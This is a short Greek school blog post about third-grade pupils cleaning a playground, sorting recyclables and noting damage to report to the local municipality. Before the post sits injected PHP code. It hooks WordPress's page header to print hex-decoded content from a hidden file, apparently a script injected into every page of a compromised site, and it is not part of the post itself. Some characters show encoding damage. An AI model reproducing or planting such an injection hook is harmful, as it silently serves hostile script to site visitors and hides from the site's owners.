if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μάθημα???σε παιδική χαρά |

Μάθημα???σε παιδική χαρά

Στις 12-04-2013 οι μαθητές της Γ τάξης συνοδευόμενοι από τις δασκάλες τους επισκέφθηκαν την πλησιέστερη παιδική χαρά.

Σκοπός της επίσκεψης στα πλαίσια της αειφόρου ανάπτυξης να καθαρίσουν το χώρο από τα πιθανά σκουπίδια εκτός κάδου και να τα ξεχωρίσουν σε ανακυκλώσιμα ή μη ?γυαλί, αλουμίνιο, χαρτί, σίδηρο, πλαστικό.

Μετά τη συγκέντρωση και τη διαλογή οι μαθητές τοποθέτησαν τα ανακυκλώσιμα υλικά στους ειδικούς κάδους ανακύκλωσης του σχολείου.

Επίσης παρατήρησαν και κατέγραψαν τυχόν καταστροφές που υπήρχαν στο χώρο της παιδικής χαράς, ώστε να ενημερωθεί ο αρμόδιος φορέας του Δήμου Ν. Κυνουρίας για να προβούν στις ανάλογες επισκευές.

100_1332.JPG100_1324.JPG100_1323.JPG100_1321.JPG